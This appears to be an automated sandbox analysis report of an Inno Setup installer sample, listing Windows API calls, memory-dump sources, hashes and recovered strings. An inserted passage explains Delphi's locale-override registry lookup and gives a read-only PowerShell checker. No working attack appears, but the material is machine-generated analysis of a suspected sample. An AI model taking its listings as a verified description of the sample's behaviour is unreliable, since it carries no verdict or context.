                                                                                    • Instruction Fuzzy Hash: EC515171A04309AEDB10EAE69D46FFE7BACFB08709F10446EF540E6182D678DE418765
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B
                                                                                      • Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                      • Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                    • Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
                                                                                    • Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
                                                                                    • Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetVersion.KERNEL32(00000000,0062C7FA,?,00000000,00000000,?,0062C810,?,0068D41B), ref: 0062C781
                                                                                    • CoCreateInstance.OLE32(006CC0C4,00000000,00000001,006CC0D4,00000000,00000000,0062C7FA,?,00000000,00000000,?,0062C810,?,0068D41B), ref: 0062C7A7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateInstanceVersion
                                                                                    • String ID:
                                                                                    • API String ID: 1462612201-0
                                                                                    • Opcode ID: 9826e4937534814f267a7b16ad82e7de6b6462802ce031e4cc7d27e7ee827f45
                                                                                    • Instruction ID: f353ce4d6a1a39ca338ca05349e2663bd9ced637506b69c883bbb80cf5210214
                                                                                    • Opcode Fuzzy Hash: 9826e4937534814f267a7b16ad82e7de6b6462802ce031e4cc7d27e7ee827f45
                                                                                    • Instruction Fuzzy Hash: F8112231688A04AFEB00EB66DC46F5E77EAEB04320F4204BAF005D7AA1D7B5AD008F14
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0060BC73,?,?,?,00000000), ref: 0060BC4D
                                                                                    • GetLastError.KERNEL32(00000000,?,00000000,0060BC73,?,?,?,00000000), ref: 0060BC55
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ErrorFileFindFirstLast
                                                                                    • String ID:
                                                                                    • API String ID: 873889042-0
                                                                                    • Opcode ID: b918b46556d871619cdd9246c2fbab89cac114e1fcc0c097a6a622e8dd6eb99f
                                                                                    • Instruction ID: 40d973860cf52e6d4e709199d75ee7f73fef1ce7e5283feda8d773f7ac4b311a
                                                                                    • Opcode Fuzzy Hash: b918b46556d871619cdd9246c2fbab89cac114e1fcc0c097a6a622e8dd6eb99f
                                                                                    • Instruction Fuzzy Hash: 09F0F931A84608ABDB14DF799C4149EB7ADDB8672075186BBF814D32D1DB754E018298
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                    • Instruction ID: dec86fcb97929b74413189edb203bd87f329489ef31ab21fd3caa719f1a03e71
                                                                                    • Opcode Fuzzy Hash: 45566dd6d5ea1f2d432aa336e5a60c1e3a8d7bb9a7f17ca8116a3bd58dd3b41d
                                                                                    • Instruction Fuzzy Hash: 95F0B430540608AFCB10EBB6DC4295EB3ACEB4431479009B6F400F32D1EB395E10995C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040E4E9,?,?), ref: 0040E2FD
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E346
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9,?,?), ref: 0040E368
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040E386
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040E3A4
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040E3C2
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040E3E0
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040E4E9), ref: 0040E420
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001), ref: 0040E44B
                                                                                    • RegCloseKey.ADVAPI32(?,0040E4D3,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040E4CC,?,80000001,Software\Embarcadero\Locales), ref: 0040E4C6
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                    • API String ID: 2701450724-3496071916
                                                                                    • Opcode ID: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                    • Instruction ID: 4455e1c2a3f30db0af6e145a4bce986524b579b5894be5bc8a3c80d05520e853
                                                                                    • Opcode Fuzzy Hash: 5aa5f0f4598f069c7b6180d6d0362751deb9bd023370fd1abe4087e628624bde
                                                                                    • Instruction Fuzzy Hash: 5C51F775A40608BEEB10DAA6CC42FAF77BCDB08704F5044BBBA14F61C2D6789A50DB5D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
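The function above is the Delphi RTL's locale-override lookup: GetModuleFileNameW fetches the module's own path, RegOpenKeyExW is tried on the four Locales keys (80000001 = HKEY_CURRENT_USER, 80000002 = HKEY_LOCAL_MACHINE; the access mask 000F0019 is KEY_READ as Delphi's Windows unit defines it, with STANDARD_RIGHTS_READ set to $000F0000 rather than the SDK's $00020000), and RegQueryValueExW reads the value under the first key that opens. The PowerShell below is an added example, not code from the sample or from this report; it walks the same keys in the same order so an analyst can check whether a host already carries an override for the path the sample ran from. The function name, parameter name, sample path and the assumption that the two RegQueryValueExW calls read the full path first and the key's default value second are this example's own choices, not facts taken from the page.

```powershell
# Added example (not the sample's code): replay the locale-override registry lookup
# seen in the dump, key by key, and report the first match for an executable path.
function Get-LocaleOverride {
    [CmdletBinding()]
    param(
        # Full path of the executable, as GetModuleFileNameW would return it.
        [Parameter(Mandatory = $true)]
        [string]$ExePath
    )

    # Same hive/key pairs, in the same order as the six RegOpenKeyExW calls in the dump
    # (80000001 = HKEY_CURRENT_USER -> HKCU:, 80000002 = HKEY_LOCAL_MACHINE -> HKLM:).
    $lookupOrder = @(
        @{ Hive = 'HKCU'; Key = 'Software\Embarcadero\Locales' },
        @{ Hive = 'HKLM'; Key = 'Software\Embarcadero\Locales' },
        @{ Hive = 'HKCU'; Key = 'Software\CodeGear\Locales' },
        @{ Hive = 'HKLM'; Key = 'Software\CodeGear\Locales' },
        @{ Hive = 'HKCU'; Key = 'Software\Borland\Locales' },
        @{ Hive = 'HKCU'; Key = 'Software\Borland\Delphi\Locales' }
    )

    foreach ($entry in $lookupOrder) {
        $regPath = "$($entry.Hive):\$($entry.Key)"
        # A missing key is the RegOpenKeyExW failure case: move on to the next one.
        if (-not (Test-Path -LiteralPath $regPath)) { continue }

        $key = Get-Item -LiteralPath $regPath
        # The dump shows two RegQueryValueExW calls; this example ASSUMES they query the
        # full executable path first and the key's default (unnamed) value second.
        foreach ($valueName in @($ExePath, '')) {
            $data = $key.GetValue($valueName, $null)
            if ($null -ne $data) {
                return [pscustomobject]@{
                    Hive      = $entry.Hive
                    Key       = $entry.Key
                    ValueName = $(if ($valueName -eq '') { '(Default)' } else { $valueName })
                    Locale    = [string]$data
                }
            }
        }
    }
    return $null   # no override found under any of the six keys
}

# Usage: the path is illustrative; substitute the path the sample was started from on the host.
$override = Get-LocaleOverride -ExePath 'C:\Users\user\AppData\Local\Temp\sample.exe'
if ($null -eq $override) { 'No locale override registered for this executable.' } else { $override | Format-List }
```

Delphi uses the locale string it finds here to choose a resource module named after the executable with the locale as its extension, so when a match turns up for the sample's path, that sibling file is worth collecting alongside the registry value.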

                                                                                    APIs
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC7E4,00008000,00000000,?,00000000,006AAF8E,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6), ref: 006AAE3C
                                                                                    • CoTaskMemFree.OLE32(?,006AAE7F,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAE72
                                                                                    • SHGetKnownFolderPath.SHELL32(006CC7F4,00008000,00000000,?,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAE8F
                                                                                    • CoTaskMemFree.OLE32(?,006AAED2,?,00000000,00000000,?,006B6424,00000006,?,00000000,006B69F6,?,00000000,006B6AB5), ref: 006AAEC5
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: FolderFreeKnownPathTask
                                                                                    • String ID: COMMAND.COM$Common Files$CommonFilesDir$Failed to get path of 64-bit Common Files directory$Failed to get path of 64-bit Program Files directory$ProgramFilesDir$SystemDrive$\Program Files$cmd.exe
                                                                                    • API String ID: 969438705-544719455
                                                                                    • Opcode ID: 696bb485f508fd4fc235287d8c56ccdf96c541909d852cd50d0c8d5b81ec93a6
                                                                                    • Instruction ID: fe51c0427e94c168f709ef2f052c82e6a7ec7b866c045d3231fd400451090af3
                                                                                    • Opcode Fuzzy Hash: 696bb485f508fd4fc235287d8c56ccdf96c541909d852cd50d0c8d5b81ec93a6
                                                                                    • Instruction Fuzzy Hash: 36819270A016089FDB15FFD4E841BAE7BA3EB4A300F90556BF401A6B91D7389D01CF66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00410CAC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise
                                                                                    • String ID: PLl$pLl
                                                                                    • API String ID: 3997070919-4186446801
                                                                                    • Opcode ID: 680169fcd532cac4d69c46f1a411d0c4da8965a060f4a2cecfd24daada8743fe
                                                                                    • Instruction ID: 89124adebdcc93ff81c3ba781c85106882e461d72a0ecd66a84e58e39c90ae7a
                                                                                    • Opcode Fuzzy Hash: 680169fcd532cac4d69c46f1a411d0c4da8965a060f4a2cecfd24daada8743fe
                                                                                    • Instruction Fuzzy Hash: 1EA17F75A01309AFDB24CFD5D981BEEBBB6AB48310F14451AE505AB390DBB4E9C0CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060EBFC,0060EBFC,?,0060EBFC,00000000), ref: 0060EB81
                                                                                    • CloseHandle.KERNEL32(006B66D7,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,?,COMMAND.COM" /C ,?,0060EBFC,0060EBFC,?,0060EBFC), ref: 0060EB8E
                                                                                      • Part of subcall function 0060E938: WaitForInputIdle.USER32 ref: 0060E964
                                                                                      • Part of subcall function 0060E938: MsgWaitForMultipleObjects.USER32 ref: 0060E986
                                                                                      • Part of subcall function 0060E938: GetExitCodeProcess.KERNEL32 ref: 0060E997
                                                                                      • Part of subcall function 0060E938: CloseHandle.KERNEL32(00000001,0060E9C4,0060E9BD,?,?,?,00000001,?,?,0060ED66,?,00000000,0060ED7C,?,?,?), ref: 0060E9B7
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                                    • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                                    • API String ID: 854858120-615399546
                                                                                    • Opcode ID: cb05d133c30b01032d10f250bae43d5c6107cd6e2c5dceb6072361d6968af2d2
                                                                                    • Instruction ID: 07a5d6622b0d651e74d63e867ec204be8bf58b8f6432d8305f3226309c39c408
                                                                                    • Opcode Fuzzy Hash: cb05d133c30b01032d10f250bae43d5c6107cd6e2c5dceb6072361d6968af2d2
                                                                                    • Instruction Fuzzy Hash: 95514F34A8031DAADB04EFE5C982ADEBBB6FF44304F60447AF805A72C1D7769A05CB55
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • PeekMessageW.USER32 ref: 005B8604
                                                                                    • IsWindowUnicode.USER32 ref: 005B8618
                                                                                    • PeekMessageW.USER32 ref: 005B863B
                                                                                    • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 005B8651
                                                                                    • TranslateMessage.USER32 ref: 005B86D6
                                                                                    • DispatchMessageW.USER32 ref: 005B86E3
                                                                                    • DispatchMessageA.USER32 ref: 005B86EB
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2190272339-0
                                                                                    • Opcode ID: be14539378901f34a9f73cd4942952708fe83c9efa75b6763ce22da6b5766406
                                                                                    • Instruction ID: 7850c8a41d1bda1102247ae3eba297ae2e53e2ccedf434ab9455d22e2f6bc662
                                                                                    • Opcode Fuzzy Hash: be14539378901f34a9f73cd4942952708fe83c9efa75b6763ce22da6b5766406
                                                                                    • Instruction Fuzzy Hash: F621F83034478065EA312D2A1C16BFE9F8D6FF1B48F14545EF58197182CEA9F846C21E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,006AB42A,?,?,00000005,00000000,00000000,?,006B7B71,00000000,006B7D26,?,00000000,006B7D8A), ref: 006AB35F
                                                                                    • GetLastError.KERNEL32(00000000,00000000,00000000,006AB42A,?,?,00000005,00000000,00000000,?,006B7B71,00000000,006B7D26,?,00000000,006B7D8A), ref: 006AB368
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID: Created temporary directory: $\_setup64.tmp$_isetup$Rm
                                                                                    • API String ID: 1375471231-619888300
                                                                                    • Opcode ID: 184f87e886625dbb871829819008579bdfdecec8b70b72511a305179fb1b08d0
                                                                                    • Instruction ID: adf2f5543b26c1b87df2d6ea404a84bc2f58e6883483325e64833120cf8cc648
                                                                                    • Opcode Fuzzy Hash: 184f87e886625dbb871829819008579bdfdecec8b70b72511a305179fb1b08d0
                                                                                    • Instruction Fuzzy Hash: B0411F34A001099BDB01FBA5D882AEEB7B6EF49304F50557AE401A7792DB74AE058F64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • GetActiveWindow.USER32 ref: 005C8073
                                                                                    • GetFocus.USER32 ref: 005C807B
                                                                                    • RegisterClassW.USER32 ref: 005C809C
                                                                                    • ShowWindow.USER32(00000000,00000008,00000000,?,00000000,4134A000,00000000,00000000,00000000,00000000,80000000,00000000,?,00000000,00000000,00000000), ref: 005C8134
                                                                                    • SetFocus.USER32(00000000,00000000,005C8156,?,?,00000000,00000001,00000000,?,00624CD7,006D479C,?,00000000,006B7D0C,?,00000001), ref: 005C813B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FocusWindow$ActiveClassRegisterShow
                                                                                    • String ID: TWindowDisabler-Window
                                                                                    • API String ID: 495420250-1824977358
                                                                                    • Opcode ID: f91cd026eb05f25d33a6d8af840a27a0896b23e2d12ba556de4d8f1fb83d8f0a
                                                                                    • Instruction ID: 5ab169a57db71ca83144016e7fa3c4a7aa592af68df439750d62b7863cf9535f
                                                                                    • Opcode Fuzzy Hash: f91cd026eb05f25d33a6d8af840a27a0896b23e2d12ba556de4d8f1fb83d8f0a
                                                                                    • Instruction Fuzzy Hash: 7D218070A41600AFD710EBA69C02F6ABBE5FB85B40F15452AF500AB291DB74AC4587D8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                      • Part of subcall function 00410BA8: GetModuleHandleW.KERNEL32(00000000,?,006C3663), ref: 00410BB4
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 006C3673
                                                                                    • SetWindowLongW.USER32 ref: 006C368F
                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,006C36D4,?,?,000000EC,00000000), ref: 006C36A4
                                                                                      • Part of subcall function 006B80BC: GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C36AE,00000001,00000000,006C36D4,?,?,000000EC,00000000), ref: 006B80C6
                                                                                      • Part of subcall function 005B8740: SendMessageW.USER32(?,0000B020,00000000,?), ref: 005B8765
                                                                                      • Part of subcall function 005B8250: SetWindowTextW.USER32(?,00000000), ref: 005B8281
                                                                                    • ShowWindow.USER32(?,00000005,00000000,006C36D4,?,?,000000EC,00000000), ref: 006C370E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Window$HandleLongModule$ErrorMessageModeSendShowText
                                                                                    • String ID: Setup$TYj
                                                                                    • API String ID: 1533765661-222076697
                                                                                    • Opcode ID: 5768e0d582e52e8d6d168eb6fadb8a8827a4ce1f72d3aeffb140806789636c9b
                                                                                    • Instruction ID: e9fc4baf4b40b491f8675e1572dec19425dd6fa1bf8a55e0520f1f642e799667
                                                                                    • Opcode Fuzzy Hash: 5768e0d582e52e8d6d168eb6fadb8a8827a4ce1f72d3aeffb140806789636c9b
                                                                                    • Instruction Fuzzy Hash: D3213E74204600AFC341EB69DC82DA67BFAEB8F7107518565F914877A1CB75A840CB65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • DeleteFileW.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A28
                                                                                    • GetLastError.KERNEL32(00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A37
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A3F
                                                                                    • RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000), ref: 00423A5A
                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D479C,?,006B7D35,00000000,006B7D8A,?,?,00000005,?,00000000,00000000), ref: 00423A68
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
                                                                                    • String ID:
                                                                                    • API String ID: 2814369299-0
                                                                                    • Opcode ID: a7d48c479effa99c13726cd06c9a81b40db213f168e3472006e923150bc3a552
                                                                                    • Instruction ID: 6af4817109388cbf865bbcb6c057fea4a38b610039f66ef5cc830b203be569cf
